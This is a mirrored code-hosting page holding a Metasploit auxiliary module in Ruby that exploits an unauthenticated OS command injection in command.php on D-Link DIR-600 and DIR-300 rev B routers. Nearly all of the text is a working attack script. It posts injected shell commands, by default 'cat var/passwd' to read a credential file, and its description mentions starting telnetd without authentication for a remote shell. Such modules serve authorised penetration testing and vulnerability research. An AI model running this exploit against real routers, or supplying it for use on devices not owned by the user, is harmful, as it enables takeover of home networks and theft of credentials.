Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

dlink_dir_300_600_exec_noauth.rb 2.4KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970
  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5. class MetasploitModule < Msf::Auxiliary
  6. include Msf::Exploit::Remote::HttpClient
  7. def initialize(info = {})
  8. super(update_info(info,
  9. 'Name' => 'D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution',
  10. 'Description' => %q{
  11. This module exploits an OS Command Injection vulnerability in some D-Link
  12. Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in
  13. command.php, which is accessible without authentication. This module has been
  14. tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.
  15. In order to get a remote shell the telnetd could be started without any
  16. authentication.
  17. },
  18. 'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
  19. 'License' => MSF_LICENSE,
  20. 'References' =>
  21. [
  22. [ 'OSVDB', '89861' ],
  23. [ 'EDB', '24453' ],
  24. [ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],
  25. [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
  26. [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
  27. ],
  28. 'DefaultTarget' => 0,
  29. 'DisclosureDate' => 'Feb 04 2013'))
  30. register_options(
  31. [
  32. Opt::RPORT(80),
  33. OptString.new('CMD', [ true, 'The command to execute', 'cat var/passwd'])
  34. ])
  35. end
  36. def run
  37. uri = '/command.php'
  38. print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
  39. data_cmd = "cmd=#{datastore['CMD']}; echo end"
  40. begin
  41. res = send_request_cgi(
  42. {
  43. 'uri' => uri,
  44. 'method' => 'POST',
  45. 'data' => data_cmd
  46. })
  47. return if res.nil?
  48. return if (res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/)
  49. return if res.code == 404
  50. rescue ::Rex::ConnectionError
  51. vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
  52. return
  53. end
  54. if res.body.include?("end")
  55. print_good("#{rhost}:#{rport} - Exploited successfully\n")
  56. print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
  57. print_line("#{rhost}:#{rport} - Output: #{res.body}")
  58. else
  59. print_error("#{rhost}:#{rport} - Exploit failed")
  60. end
  61. end
  62. end